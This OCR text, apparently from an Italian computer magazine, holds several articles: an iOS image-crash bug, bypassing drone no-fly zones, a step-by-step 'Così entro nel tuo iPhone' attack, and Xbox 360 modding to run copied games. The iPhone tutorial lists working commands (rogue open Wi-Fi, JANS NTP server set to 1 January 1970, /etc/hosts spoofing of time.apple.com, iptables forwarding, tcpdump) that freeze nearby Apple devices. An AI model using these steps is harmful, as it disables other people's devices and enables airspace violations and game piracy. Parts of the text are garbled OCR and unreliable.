che, in condizioni normali genera l'aper¬ 
tura deH’immagine stessa. Nel caso di 
una immagine PNG modificata, invece, 
viene effettuato un accesso illegale al 
kernel: 
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Exception Type: EXC_ 

BAD_ACCESS (SIGSEGV) 

Exception Subtype: KERN_INVA- 
LID_ADDRESS at 0x0000000000000000 

Triggered by Thread: 0 

che causa a sua volta un indirizzamen¬ 
to di memoria errato con conseguente 
ed immediato crash dell'applicazione 
utilizzata per l'apertura dell’immagine 
in questione. 

Applicazioni a rischio 

Analizzando più attentamente i risul¬ 
tati della ricerca condotta da Brandt si 
scopre che la vulnerabilità risiede nel 
framwork Image I/O, una raccolta di li¬ 
brerie e strumenti utili proprio per la 
gestione e la visualizzazione dei formati 
grafici sui sistemi operativi Apple. Ol¬ 
tre che dal browser Safari e dal client di 
posta elettronica Mail, queste librerie 
vengono utilizzate anche da numerose 
altre applicazioni tra cui Chrome, Fire- 
fox e Telegram. È facile intuire, quindi, 
quando sia elevata la pericolosità del bug 
che colpisce tutte le versioni di iOS dalla 
7.1 alla 9.3 e di OS X dalla 10.11.1. Apple 
ha comunque comunicato che la falla 
di sicurezza nei suoi sistemi operativi è 
stata chiusa con le versioni 9.3.2 di iOS 
e 10.11.5 di OS X. Nelle nostre prove di 
laboratorio, inoltre, abbiamo verificato 
l'iinocuità del bug anche sulla beta di iOS 
10 (che abbiamo provato in anteprima su 
Win Magazine 222, a pagina 88). 

Se cerchiamo maggiori informa¬ 
zioni di natura tecnica possia¬ 
mo trovarle direttamente sul blog 
del ricercatore all'indirizzo Web 
www.winmagazine.it/link/3633. 
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IL TUO DISPOSITIVO IOS È A RISCHIO? SCOPRILO COSI 


Il ricercatore Lander Brandt, 
dopo aver scoperto la vul¬ 
nerabilità nei sistemi ope¬ 
rativi iOS, ha realizzato una 
PNG appositamente modi¬ 
ficata che, se aperta con 
il browser Safari, ne causa 
il crash immediato, senza 
comunque mettere a repen¬ 
taglio l'integrità del sistema 


(come invece avverrebbe 
con le immagini malevole 
diffuse su Internet dai pira¬ 
ti informatici). Possiamo 
quindi provare ad aprire 
questa PNG per verificare 
se anche il nostro disposi¬ 
tivo è vulnerabile e quindi 
a rischio attacco: basta col¬ 
legarsi all'indirizzo Internet 


www.winmagazine.it/ 
link/3634. Se il browser 
Safari si chiude inaspet¬ 
tatamente, non perdiamo 
altro tempo e chiudiamo 
la falla di sicurezza aggior¬ 
nando il sistema operativo 
dell'iPhone, dell'iPad o del 
Mac all'ultima versione uffi¬ 
ciale rilasciata da Apple. 



KANYE WEST 9 i I*. 

Shut thè fuck up and enjoy thè greatness. 

155,372 114,330 
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Hardware I Droni 



A 


- 


vola sulle 
fly zone! 

Così si riprogramma un drone 
per sorvolare anche le zone 
aeree in cui è proibito il volo 


Cosa ci f 
occorre FACLE 


DRONE 

DJI PHANTOM 
3 STANDARD 

Quanto costa: € 599,00 
Sito Internet: 

www.dji.com 


APP DI CONTROLLO 

DJI GO 

Lo trovi su: IFCD ✓DVD 

Sito Internet: 

www.dji.com 
Note: L’app è 
disponibile anche 
per dispositivi iOS 


L a tragedia del terremoto che ha colpito 
le Marche e l’Umbria lo scorso mese di 
agosto ha confermato ancora una volta, 
qualora ce ne fosse bisogno, quanto i droni 
siano ormai onnipresenti nelle nostre vite di 
tutti i giorni. Per primi questi velivoli hanno 
mostrato al mondo la distruzione di quei posti, 
riuscendo a raggiungere dopo poco tempo i 
luoghi del disastro più rapidamente anche dei 
primi soccorritori bloccati da macerie, strade 
pericolose e ponti pericolanti. Loro, i droni, 
invece erano già sul posto muniti ovviamente 
di videocamere. Anche se in questo caso la 
loro utilità è stata fuori discussione in quanto 
hanno permesso di avere una prima stima dei 
danni e della devastazione subita dai territori 
interessati dal terremoto, il loro sorvolo su zone 
comunque critiche ha riaperto la discussione 
sull’opportunità di un sorvolo libero e senza 
un minimo controllo da parte delle autorità. 

Regolamenti da rispettare 

Non è un caso se tutti gli enti che gestisco¬ 
no e controllano in tutto il mondo il volo da 
parte di velivoli con e senza pilota hanno 
stilato dei regolamenti che, tra le altre cose, 
indicano chiaramente le cosiddette “no-fly 
zone”, cioè le zone in cui il volo è interdetto 
o quantomeno consentito previa autorizza¬ 
zione: si tratta di zone a rischio terrorismo 
o di importanza strategica per uno Stato o 
ancora semplicemente di aree private che 
è proibito sorvolare senza autorizzazione. 
Tutti i produttori di droni, di conseguenza, si 
sono adeguati a questa normativa riprogram¬ 
mando opportunamente il firmware dei loro 
dispositivi in modo tale che, avvicinandosi 
a queste aree, semplicemente smettano di 
volare. Ma come spesso accede, c’è sempre 
qualcuno che riesce ad aggirare la legge e a 
volare liberamente anche sulle no-fly zone. 
Ecco in che modo. 





Droni | Hardware 
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Come gestire le no-f ly zone 

Nelle ultime versioni dell’app di controllo DJI Go è stato inserita la funzione GEO (Geospatial 
Environment Online) che impedirà a chiunque il sorvolo di zone a rischio. Ecco come funziona. 



^ Una mappa mondiale 

Dall’app DJI Go o collegandosi via Internet a www.win- 
magazine.it/link/3637 è possibile conoscere le diverse 
zone di volo indicate con i colori verde, giallo e rosso. Nelle 
prime i droni possono volare liberamente. Nelle aree gialle 
serve invece una specifica autorizzazione, mentre nelle aree 
rosse qualunque drone sarà inibito al sorvolo, anche quel¬ 
li i cui piloti posseggono una qualche autorizzazione di volo. 


^ Autorizzazione concessa 

Per poter volare su un’area geografica segnalata con 
codice colore giallo, il pilota del drone deve prima otte¬ 
nere una specifica autorizzazione. Dopo avere effettuato la 
richiesta, dovrà confermarla fornendo il proprio numero di 
telefono o in laternativa il numero di carta di credito. Solo 
dopo aver ottenuto le necessarie autorizzazioni potrà prende¬ 
re il volo con il suo drone. 



m 


SCATTANO 

LEMULTE 


Mentre stavamo 
scrivendo l'articolo è 
arrivata la notizia di 
una prima multa com¬ 
minata ad un pilota di 
droni che ha sorvolato 
Piazza San Marco a 
Venezia senza avere 
alcuna autorizzazione. 
Una delle piazze più 
famose al mondo, in¬ 
fatti, rientra nell'area 
protetta dell'aeroporto 
della città lagunare ed 
in più su di essa vige un 
regolamento della po¬ 
lizia locale che vieta il 
sorvolo di monumenti 
storici. A quanto pare, il 
"pirata" dell'aria era un 
turista bulgaro beccato 
a volare a circa 50 metri 
di altezza sulla piazza 
con un Phantom 4. Il pi¬ 
lota è stato punito con 
una sanzione di 2.064 
euro e ora rischia anche 
una denuncia per 
violazione del codice di 
navigazione. 


FATTA LA LEGGE, TROVATO L'INGANNO! 


Le no-fly zone continuano a far discutere i nu¬ 
merosi piloti e appassionati di droni che, in 
queste regole, riscontrano pesanti limitazioni 
alia loro libertà di volo. Su Internet sono quindi 
comparse alcune schede elettroniche che, una 
volta installate nel drone, permettono di igno¬ 
rare le limitazioni imposte dalle no-fly zone. 
In particolare, i piloti più spregiudicati acqui¬ 
stano la scheda NFZ per Phantom 3 PRO/ADV 
acquistabile su diversi siti Internet al prezzo di 
circa 250 euro. La scheda, una volta collegata 
alla scheda madre del drone mediante i cavetti 
forniti in dotazione, permette di volare utiliz¬ 
zando il posizionamento GPS anche all'interno 
delle zone NFZ. In modalità di funzionamento 
predefinita, l'app DJI Go disattiva come impo¬ 
stazione predefinita la modalità di volo NFZ; 
mediante la scheda, invece, è possibile di fatto 
riprogrammare il firmware del drone per di¬ 
sattivare la modalità di volo direttamente dal 
radiocomando mediante l'app di controllo. 
Installare la scheda sul proprio drone non è 
semplice, in quanto un collegamento sbagliato 
rischia di mandare in corto circuito la scheda 


madre con conseguente danneggiamento ir- è il numero particolarmente elevato di utenti 
reparabile del velivolo. Su YouTube, comuqnue, che hanno visualizzato queste guide, segno che 
non mancano ivideotutorial che guidano i piloti le limitazioni per le no-fly zone non sono ben 
nelle operazioni più delicate. Quello che stupisce viste dagli appassionati di droni! 



La NFZ per Phantom 3 è una scheda elettrinica che, collegata alla scheda madre del Phantom 3, permette 
di riprogrammare il drone allo scopo di consentire il volo anche sulle no-fly zone. 
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Si fa così | Così entro nel tuo iPhone 


Un pirata ci ha mostrato quanto è facile prendere 

ATTENZIONE! 

il controllo remoto di qualunque dispositivo iOS 

Ricordiamo che violare le reti altrui 
è un reato perseguibile penalmente 

Così entro 
nel tuo IPhone 

dalla legge italiana (art. 615-ter del 
codice penale). Le procedure da noi 
descritte, pertanto, devono essere 
utilizzate esclusivamente al fine 
di testare la sicurezza della prò- A 
pria rete locale Wi-Fi e, inter- i/ £~\ 
venendo sulle impostazioni 
dei dispositivi, renderla 
invulnerabile a qualsiasi 
attacco esterno. M 


U n bug dei sistemi iOS 8 per¬ 
metteva ad un pirata la co¬ 
struzione di una "no-iOS zone" 
sfruttando la propria connessione Wi- 
Fi: in pratica, al pirata bastava offrire 
un hotspot privo di password e for¬ 
nire, alla connessione, un certifica¬ 
to di sicurezza contraffatto. Questo 
mandava in crash il sistema operati¬ 
vo di Apple che smetteva di funzio¬ 
nare fintanto che il dispositivo rima¬ 
neva nel raggio di azione dell'anten¬ 
na Wi-Fi del pirata. Poche settimane 


fa è stato scoperto un altro bug, sta¬ 
volta presente anche nella versio¬ 
ne 9 di iOS, capace di bloccare il si¬ 
stema. Le radici di questo bug sono 
piuttosto antiche: risalgono al gior¬ 
no 1 gennaio 1970. 

Di cosa si tratta? 

Al giorno d'oggi siamo in grado di mi¬ 
surare il tempo in modo molto pre¬ 
ciso grazie agli orologi atomici, ma 
è necessario disporre di un sistema 
di comunicazione dell'orario molto 


rapido ed efficiente a cui tutti possa¬ 
no accedere: le reti di computer svol¬ 
gono egregiamente questo compi¬ 
to grazie ai server NTP che trasmet¬ 
tono continuamente l'ora esatta. Per 
renderlo comprensibile da chiun¬ 
que, inoltre, l'orario viene comuni¬ 
cato con un singolo numero facile 
da trasmettere, memorizzare e ma¬ 
nipolare. Come? Gli ideatori di Unix 
hanno risolto il problema contando 
i secondi che trascorrono da un pre¬ 
ciso momento e cioè dall'1 gennaio 



Gli strumenti software del 



Per creare e configurare un hotspot Wi-Fi malevolo con cui attirare le sue potenziali vittime, lo smanettone 
malintenzionato ha bisogno del sistema operativo Kali Linux che utilizzerà da una semplice chiavetta USB. 



La pendrive con Kali 

Il pirata scarica innanzitutto l'immagine ISO 
della distro Kali Linux da Internet e usa il 
tool Win32Diskimagerper sam\asu una 
chiavetta USB. Inserita la pendrive nel PC che userà 
come finto router, il pirata lo awia dalla porta USB e 
preme Invio per far partire il caricamento del sistema. 


Configurazioni di rete 

Dal desktop di Kali il pirata clicca sull'Icona 
del network manager nella barra degli stru¬ 
menti: nell'elenco delle connessioni clicca 
sulla chiave inglese e cerca la rete Ethernet che rap¬ 
presenta la connessione tra il suo PC ed il router 
domestico e ha un metodo IPv4 di tipo Automatic. 


La trappola è pronta 

Il pirata aggiunge una nuova connessione 
senza fili scegliendo la versione condivisa 
affinché il PC si comporti come hotspot Wi-Fi. 
Come SSID il pirata sceglie un nome standard come 
attwifi usato da molti hotspot pubblici per far sì che 
alcuni dispositivi si connettano automaticamente. 
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1970, alle ore 00:00:00. Il tempo vie¬ 
ne misurato sempre in riferimento 
a questa data. Tutto va bene finché 
i programmatori non commettono 
qualche errore. Che poi è quello che 
è successo ai programmatori Apple: 
se per qualche motivo la data attua¬ 
le viene impostata al giorno di rife¬ 
rimento Unix, il sistema si ritrova a 
lavorare con 0 secondi. E siccome i 
programmatori non hanno previsto 
alcun meccanismo di controllo, tut¬ 
te le operazioni matematiche falli¬ 
rebbero, mandando in tilt i disposi¬ 
tivi Apple! 


COSI IL PIRATA COLLEGA UN'ANTENNA WI-FI 


L'idea del pirata è di costruire una 
"no iOS zone"sfruttando una rete 
Wi-Fi malevola capace di bloccare i 
dispositivi mobili di Apple. Questo 
significa che l'area in cui non po¬ 
tranno essere presenti dispositivi 
iOS sarà tanto maggiore quanto 
più grande sarà il raggio coperto 
dall'antenna. In genere le antenne 
integrate nei portatili hanno poca 
potenza: per tale motivo spesso i 
pirati si rivolgono a delle antenne 
USB che coprono un raggio molto 


maggiore. Naturalmente si deve 
anche considerare che la norma¬ 
tiva europea precisa dei limiti 
piuttosto stringenti per quanto 
riguarda la potenza delle antenne 
(proprio per evitare interferenze a 
lungo raggio). Ma ai pirati poco 
importa! Esistono in commercio 
antenne con potenze superiori ai 
100 mW, il limite normativo, e 
sono progettate per situazioni 
difficili come edifici con muri 
molto spessi. Un esempio è la 


Alfa AWUS036H (www.winmagazi- 

ne.it/link/3507). Acquistare queste 
antenne non è un reato, utilizzarle 
per interferire con al¬ 
tri dispositivi sì. 



m II server misura il tempo 

Grazie ad un server NTP capace di inviare un orario errato, il pirata può fornire ai dispositivi Apple che si collegano 
al suo hotspot Wi-Fi malevolo la data critica 1 Jan 1970, mandandoli immediatamente in blocco. 



La rete condivisa 

Nella finestra di configurazione della rete in 
Kali Linux, il pirata si assicura che la sicurez¬ 
za sia impostata a None , così che non ci sia 
alcuna password di accesso. Verifica poi che la scheda 
IPv4 abbia il valore Method impostato a Shared to 
othercomputers. La connessione è pronta. 



Un server da attivare 


B Prima di procedere oltre con la configurazio¬ 
ne, il pirata pulisce il terminale dando il co¬ 
mando c/ear seguito da Invio e scarica il 
programma JANS con il comando wgethttps://www. 
vanheusden.com/time/jans/jans-0.4.tgz. Si tratta del 
server NTP utilizzabile per lo spoofing. 



Un nuovo terminale 

a ll pirata deve ora abilitare l'inoltro del traffico 
Internet tra la scheda Wi-Fi e la scheda Ether¬ 
net del suo PC. Per farlo apre un Terminale 
e da il comando sudosysctl-wnet.ipv4.ip_forward=1 
seguito da Invio. Se ha configurato tutto correttamen¬ 
te, il comando non dovrebbe dare nessuna risposta. 



Tutti itile che servono 


H Terminato il download, il pirata provvede ad 
estrarre il contenuto dell’archivio compresso 
contenente il server con il comando far -xvf 
jans-0.4.tgz. Il comando dovrebbe presentare l'elenco 
dei file estratti, racchiusi in una cartella. Il pirata entra 
nella cartella con il comando cdjans-0.4. 



Un firewall ad hoc 

Il pirata configura anche il firewall di Linux 
affinché si occupi di dirigere correttamente i 
pacchetti della connessione: se non lo faces¬ 
se, le vittime si accorgerebbero di non riuscire a navi¬ 
gare sul Web. Il comando è sudo iptables-t nat -A 
POSTROUTING -o ethO -j MASQUERADE. 



Una verifica finale 


a ll programma deve ora essere compilato per 
renderlo funzionante: il pirata può farlo con il 
comando make. Potrebbe ottenere alcuni 
messaggi di avvertimento ( warnin g) ma nessun errore. 
Basta dare poi il comando Is -Ijans per verificare che 
sia stato realizzato il file eseguibile chiamato jans. ► 
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O Hacker in pratica 


Si fa così I Così entro nel tuo iPhone 




CORRERE 
RIPARI 


Se il nostro iPhone 
oiPadègiàstato 
compromesso dal bug 
analizzato nell'articolo 
e non si avvia più, 
purtroppo non esistono 
metodi casalinghi per 
risolvere il problema. 
Alcuni utenti hanno 
riferito di essere 
riusciti ad eseguire un 
ripristino con iTunes 
dopo avere scollegato 
la batteria, ma questo 
invalida lagaranzia.il 
consiglio migliore è di 
recarsi presso un Apple 
Store per chiedere assi¬ 
stenza. 


0 I dati vengono dirottati 

I dispositivi Apple sono configurati per contattare sempre lo stesso server NTP quando devono 
sincronizzare l'orologio. Il pirata sa però come reindirizzare le connessioni sul proprio computer. 







ima aacacDES 

1 




IBI o luca : bash - Konsol 

File Modifica Visualizza Segnalibri Impostazioni Ai 


IrootdTRINGALINVENT nano /etc/hosts| 


Ecco l’ora sbagliata 

I pirata può avviare il proprio server NTP con una data falsa: 
deve dare il comando date -s “1 JAN 1970 00:00:00” && 
,/jans -t Constant. Nel caso avesse più schede Wi-Fi può 
indicare quella da utilizzare aggiungendo al comando il parametro -/ 
wlanO. La porta predefinita è sempre 123. 



Connessioni dirottate 


B Non è finita: il pirata in questo momento ha un server NTP 
fasullo, ma deve ancora convincere le vittime che il suo 
server NTP sia in realtà quello di Apple. Per farlo, dovrà 
modificare il file /etc/hosts che permette di aggirare i DNS dell'uten¬ 
te. Basta dare il comando sudo nano/etc/hosts. 



Un finto server Apple 


a In un punto qualsiasi del file è sufficiente aggiungere le righe 
127.0.0.1 time.apple.com e 127.0.0.1 pool.ntp.org. Even¬ 
tualmente, per evitare problemi di riferimento, il pirata può 
sostituire a 127.0.0.1 il proprio indirizzo IP Wi-Fi (che trova dando il 
comando ifconfig wlanO da Terminale). 


Pensare agli attacchi futuri 


S II file così modificato può poi essere salvato premendo Ctrl+O 
e dando Invio. Per chiudere l’editor di testo il pirata preme 
Ctrl+X. Non gli rimane che attendere che i malcapitati si 
colleghino alla rete: il pirata può controllare il traffico del Wi-Fi con il 
comando sudo tcpdump -X -i wlanO. 


ECCO COME AGGIORNARE IOS 
PER METTERCI AL SICURO 


Abbiamo visto quanto è facile 
per un pirata bloccare un di¬ 
spositivo Apple mediante un 
hotspot Wi-Fi malevolo creato 
ad hoc sfruttando una vulne¬ 
rabilità di iOS. Per fortuna il 
problema è stato risolto nella 
versione 9.3 del sistema opera¬ 
tivo. La soluzione più sempli¬ 
ce è dunque l'aggiornamento 
del sistema. Ma questa non è 


l'unica opzione: il problema 
infatti non si presenterebbe 
se si evitasse la connessione 
automatica a reti non protette 
da chiavi WPA2 od altre forme 
di crittografia. In generale, una 
rete sprovvista di password 
non è una buona idea: anche 
ammettendo che la rete non 
sia stata costruita da un pira¬ 
ta appositamente per attirare 


utenti che può poi spiare o 
danneggiare in qualche mo¬ 
do, esiste comunque la fondata 
possibilità che tale rete venga 
intercettata da un pirata che 
desidera leggere le comunica¬ 
zioni di tutti gli utenti. È buona 
norma, quindi, disabilitare la 
connessione automatica del 
Wi-Fi tranne che per le reti della 
cui sicurezza siamo certi. 
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O Hacker in pratica 


Tutorial | Console: upgrade sblocca-tutto 



Opnsole: upgrade 
sblocca-tutto 

Così i pirati aggiornano le Xbox modificate 
per continuare a giocare gratis con i nuovi 
titoli e divertirsi con la Kinect 




L a nascita e l’evoluzione delle console di 
gioco sono fenomeni tipici degli ultimi 
40 anni della nostra storia e queste mac¬ 
chine delle meraviglie rappresentano oggi il 
40% dell’intero mercato videoludico. Questo 
porta le grandi case produttrici di console, 
come Microsoft e Sony, a puntare molto su 
questo settore, proponendo agli utenti 
hardware sempre più potenti in 
grado di riprodurre esperienze 
di gioco realistiche e al passo 
con le produzioni delle sof¬ 
tware house di videogiochi. 
Una delle più grandi spine 
nel fianco per le aziende 
produttrici di console è 
però lo sviluppo, da par¬ 
te di esperti hacker, di 
modifiche (hardware 



o software) che permettono di eseguire copie 
di backup di giochi scaricati dal Web diretta- 
mente sulla console senza la necessità, natu¬ 
ralmente, di acquistare il titolo. 

Tutto inizia con la Playstation 

Dalla prima Playstation in poi, lanciata sul mer¬ 
cato nel 1994, gli hacker sono sempre riusciti 
a modificare le console anche quelle di nuova 
generazione. Naturalmente, le case produttrici 
non sono rimaste a guardare e sono sempre 
corse ai ripari aggiornando software e dashbo- 
ard dei propri dispositivi in modo da prevenire 
eventuali hack del sistema e rendendo questi 
aggiornamenti necessari al corretto avvio dei 
giochi e prevenendo, di fatto, la possibilità di 
avviare i backup con sistemi modificati. I pirati 
delle console, quindi, una volta effettuata la 
loro modifica, non possono restare tranquilli 


ATTENZIONE! 

Al momento, in Italia non c'è un preciso orientamento legisla¬ 
tivo in merito alla modifica delle console di gioco. Le nostre 
corti di giustizia considerano l'applicazione dei cosiddetti 
modchip e, più in generale, le modifiche per le console da 
gioco come illecite per violazione dell'art. 171 -ter della _ 
nostra legge sul diritto d'autore. Molte sono invece ] 
le posizioni dottrinali opposte, le quali valutano i | 
modchip come importanti strumenti per garantire 
interoperabilità e incentivare gli sviluppatori in-^^- 
dipendenti. É opportuno comunque pre- '> ^ il 

cisare che Win Magazine non si schiera 
ovviamente a favore della pirateria: le / .^9 

procedure mostrate nell'articolo non 
vengono volutamente pubblicate à 

in maniera dettagliata per non 
consentire di mettere in pratica 
la modifica della console. M 9 


COSI I PIRATI AGGIORNANO LE 



Ip™ S 7°at“SS^ “ U PERI ™« 

mento alternativo ea ? Endela . fesedi carica¬ 
si collegherà all'Xbox diaitanrin noi k I termine, tramite computer 

ricavare la CPUKEY, il codice identificTtivcud! ogn^Xbox de " a C ° nS0 * e per 
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Console: upgrade sblocca-tutto | Tutorial 


Hacker in pratica 


LE PRINCIPALI MODIFICHE CHE SI POSSONO APPORTARE SULL'XBOX 360 


TIPO DI MODIFICA 

DESCRIZIONE 

VANTAGGI 

SVANTAGGI 

FLASH DEL 
LETTORE 

Consiste nella riscrittura, tramite 
software, del firmware originale 
del lettore; lo stesso firmware viene 
sostituito con uno preparato "ad hoc" 
che permetta la riproduzione di ISO 
masterizzate su DVD+R DL. 

• Immediatezza di utilizzo 

• Permette il gioco Online (non è garantita la NON esclusione 
dal UVE ufficiale) 

• Compatibilità limitata con alcuni 
giochi 

• Deve essere aggiornato ad ogni 
avvento di nuove protezioni 
inserite sui giochi 

• Richiede un materizzatore 
compatibile con tali firmware 

RESET GLITCH 
HACK 

Viene sfruttato un impulso (il glitch), 
creato ed implementato da un Hardware 
installato (il Glitcher) dentro la console, 
al fine di poter"inserire", durante la 
procedura di avvio della macchina, 
un codice non firmato che, una volta 
avviato, permetta la riproduzione di 
software non firmato dal produttore. 

• Permette la riproduzione da Hard Disk, interno od esterno, 
di codice non firmato, Backup dei propri giochi originali, 
Emulatori di retroconsole, homebrew ed applicazione di 
terze parti 

• Permette un pieno controllo e la regolazione della 
temperatura di utilizzo della console 

• Non sono strettamente necessari aggiornamenti successivi 
all'installazione 

• Non permette il gioco Online 

• Ha tempi di avvio variabili 
(da 30 secondi a 2 minuti 
dall'accensione della console) 

EMULATORI 

DEL LETTORE 
ODE 

Viene sfruttato un hardware che emula 
il lettore della console e permette la 
riproduzione di ISO da Hard Disk USB 
esterni. 

• È disattivabile 

• È di immediato utilizzo 

• Permette di effettuare aggiornamenti ufficiali 
(disattivandolo) 

• Permette il gioco online (Non è però garantita la NON 
esclusione dal UVE ufficiale) 

• Non permette la riproduzione di 
software non firmato 

• Non permette l'esecuzione di 
emulatori od Homebrew 

• Il costo dell'emulatore 

MULTI 

NANDRGH 

Alla modifica RGH citata prima viene 
aggiunta una o più modalità di avvio. In 
tal maniera è possibile avviare la console 
anche in modalità originale e godere dei 
benefici che ne conseguono. 

• Permette la riproduzione da Hard Disk, interno od esterno, 
di codice non firmato, Backup dei propri giochi originali, 
Emulatori di retroconsole, homebrew ed applicazione di 
terze parti 

• Permette un pieno controllo e la regolazione della 
temperatura di utilizzo della console 

• Permette, in modalità originale, di effettuare 
aggiornamenti ufficiali sulla console 

• Permette il gioco Online in modalità originale (non è pero' 
garantita la NON esclusione dal LIVE ufficiale) 

• Ha tempi di avvio variabili 
(da 30 secondi a 2 minuti 
dall'accensione della console) 


ma anzi, al contrario, devono mantenere la 
loro macchina da gioco sempre aggiornata. 
Dovranno verificare periodicamente l'uscita 
in Rete di eventuali upgrade della dashboard 


che consentano loro di giocare anche ai vide¬ 
ogiochi appena usciti sul mercato o di usare la 
kinect senza problemi. Una procedura piutto¬ 
sto delicata ma che, nel caso della Xbox 360, 


è anche abbastanza semplice da eseguire: al 
pirata, infatti, bastano una chiavetta USB, sulla 
quale copiare i tool necessari per completare 
la modifica, e la cosiddetta chiave CPUKEY. 


XBOX MODIFICATE 




DCarttM* * m **** M£: 


W3* 
HMO KmM» 


in FAT32) il file Defaultxex. 


nano 0 sS.!**""* *wt**v) Wt 

**> 
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Tutorial | Console: upgrade sblocca-tutto 


^OSÌI PIRATI AVVIANO I GIOCHI SULLE CONSOLE MODIFICATE 

Prima di poter usare la Xbox modificata, il pirata deve opportunamente "trattare" i giochi per consentire alla console di leggerli. 
Tale procedura cambia a seconda che il gioco viene caricato dall'hard disk interno alla console o da una chiavetta USB. 
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Avvio giochi da disco 

Se la modifica alla Xbox è stata effettuata ag¬ 
giornando il firmware del lettore ottico, il 
pirata effettuerà la masterizzazione dei 
giochi su dischi DVD da 8 GB utilizzan¬ 
do un qualsiasi software di maste¬ 
rizzazione, previa patch con un 
particolare software facilmente 
reperibile in Rete. È richiesta una 
connessione ad Internet duran¬ 
te l'esecuzione del programma. 

Dopo aver avviato il tool per 

patchare il gioco, il pirata procederà con il settaggio delle varie opzioni. Al ter¬ 
mine, procederà al caricamento del gioco in formato ISO selezionando il file 
immagine disponibile su disco.Tutta questa procedura serve per rendere 
le copie di backup il più possibile simili agli originali, onde ce ne fosse 
bisogno, e quindi di assicurarne il funzionamento su lettori con la 
modifica firmware. Nei canali underground del Web, generalmente, 
i giochi si trovano pronti per la masterizzazione e formati da un 
file .ISO e da un file .DVD con lo stesso nome che precede 
l'estensione. In IMGBURN sarà sufficiente selezionare il file 
.DVD: il software automaticamente masterizzerà il .ISO 
su disco, associandogli alcuni importanti parametri per 
una scrittura corretta (come il LAYERBREAK). 
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TsOfTWABESBLOCCA CONSOLE CON LA 
DASHBOARD DENTRO j-runner contenente 

Il pirata avvia sul PC una eUadashboard. Nella schermata 
anche l'ultima release de d carica ,, dump 

principale inserisce la„ processo di agg.or- 

flashdmp.bm da Load S /mage. 

namento con il tasto creai 



. Canneto • Denoto* • >—<*» 


CHiutt.tr» 

Ump* S tO NANO f 


ALLA RICERCA DEL NUOVO DUMP 

Terminata la fase di upgrade, lo smanettone copia.sul a 
chiavetta il file updflash.bin creato al Passo 4. Scollega la 
pendrive dal con^puter e la collega nuovamente alla Xbox. 
Dal File Manager del Freestyle avvierà questa volta il file 

Default.xex. 
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Hacker in pratica C* 


Avvio giochi da USB 


ISO Detaih^ 

Image Location: 


Output Location: 

Title Detail; 

Name: The Saboteut 

TMelD: 4541088F 

MedalD 7547ED02 



Disc: 1 ì 1 

Plat: 0 Ex: 0 


V 


Nei tipi di modifica in cui è permessa la riprodu¬ 
zione di backup da supporti rimovibili USB è ne- 
cessario"preparare"questi ultimi affinché vengano 
riconosciuti dalla console stessa o dall'hardware 
che li ospita. Nel caso di emulatore del Lettore 
ODE, il pirata formatta in NTFS il supporto USB da 
utilizzare. Dentro la root principale crea una car¬ 
tella chiamata GAMES dove andrà a copiare le ISO 
nude e crude. Mediante alcuni semplici passaggi 
sull'interfaccia ufficiale (dashboard) della console 
caricherà il menu di selezione della ISO stessa. Per 
le modifiche Reset Glitch Hack e MultiNand RGH 
dovrà invece formattare il supporto USB\nFAT32 e 
creare all'interno una cartella destinata ad ospitare 
i giochi in formato GOD o folder. Grazie ad un sof¬ 
tware di conversione, freeware e reperibile in rete, 
il pirata trasforma le ISO nude e crude in formati 
riconosciuti dalla console e le copia sul supporto 
USB. Al pirata basterà poi selezionarne il percorso 
di ricerca dall'interfaccia dedicata (Freeboot) per 
ritrovarseli tutti nel catalogo di Freeboot stesso, 
pronti per essere giocati. IS02G0D rappresenta il 
software di conversione per eccellenza preferito 

dagli smanettoni delle console, sia per la praticità che per la velocità di utilizzo. Caricata l'immagine ISO del gioco 
il pirata inizia con la conversione e al termine provvede alla copia. Alla fine del processo troverà direttamente il 
gioco convertito sotto forma di cartella alfanumerica, ovviamente nel percorso precedentemente scelto in OUTPUT. 
Allo stesso modo è possibile selezionare come destinazione l'hard disk della console, previa connessione in rete di 
quest'ultima tramite cavo Ethernet. Al pirata basterà poi impostare l'indirizzo IP di quest'ultima ed il gioco è fatto. 


Padding Remova^u 

Mode: v 0 Save Rebwlt ISO lmag<| 

*aiy Location for Rebui ISO: 

C ' 



DASHBOARD 

Indica la versione del 
sistema operativo 
presente sulla conso¬ 
le. Ad ogni differente 
versione della da¬ 
shboard corrisponde 
una diversa versione 
del kernel. 

CPUKEY 

È una chiave esade- 
cimale univoca asso¬ 
ciata alla CPU della 
console. 

B00TL0ADER 

Una delle parti del 
kernel il cui compito 
è quello di avviare 
tutti i componenti 
software necessari 
al corretto funziona¬ 
mento della console. 

HOMEBREW 

Software realizzati 
esclusivamente per 
funzionare su conso¬ 
le modificate e non 
approvati diretta- 
mente da Microsoft. 



LA MODIFICA DELL'XBOX È SERVITA- 

Al termine, estrae la chiavetta p procedura dl aggiornar 
Per la gioia del parata "° rmalmente l'Xbc 

di nuova generazione. per su PP° rtare anche 


SE LA KINECT È FUORI USO 


Abbiamo visto che i pirati delle 
console una volta effettuata la loro 
modifica, non possono restare tran¬ 
quilli ma sono costretti a mantenere 
la loro Xbox sempre aggiornata se 
vogliono continuare a giocare gratis 
con i nuovi titoli scaricati dalla Rete 
o se vogliono divertirsi con i giochi 
che usano la Kinect. Nel caso della 
Kinect, potrebbe presentarsi a vi¬ 
deo una schermata di errore che 
invita il giocatore ad effettuare un 
upgrade del sistema. Va detto che la 
Kinect per il corretto funzionamen¬ 
to richiede anche l'aggiornamento 
Avatar installato. Questo succede 
principalmente con leXbox360, con 
modifica RGH, che a causa dell'ag¬ 



giornamento della Dashboard Live 
si ritrovano con una versione della 
Dash differente rispetto a quella pre¬ 
sente nella parte RGH. Per risolvere 
questi problemi (aggiornamento Ki¬ 



nect più Avatar), il pirata scaricherà 
da Internet la stessa versione della 
Dashboard installata sulla propria 
console. Effettuato il download 
estrae il contenuto dell'archivio nella 
cartella $$ystemupdate e copierà il 
tutto in una chiavetta USB. Avvia la 
console (scollegata dalla Rete) con 
la Dashboard Originale, inserisce la 
pennetta e attende che la periferica 
di gioco porti a termine gli aggior¬ 
namenti richiesti. 
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Fai da te | Fotografa con Arduino 


Foto (l’autore 
con l’Arduino! 


Ecco come creare un mini robot comandabile 
da smartphone per realizzare fantastici foto/video 
in timelapse usando la tua digicam 


Cosa oi 
occorre FAlciLE 


SCHEDA ELETTRONICA 

ARDUINO 
UNO REV.3 

Quanto costa: € 21 ,oo 
Sito Internet: 

www.amazon.it 


APP PER ARDUINO 

BLINK 


SOFTWARE COMPLETO 


Sito Internet: 

https://play.google.com 
Note: L’app è 
disponibile anche 
per dispositivi iOS 


N el 1914 il regista Giovanni Pastrone ha rivo - 
luzionato il cinema mondiale inventando 
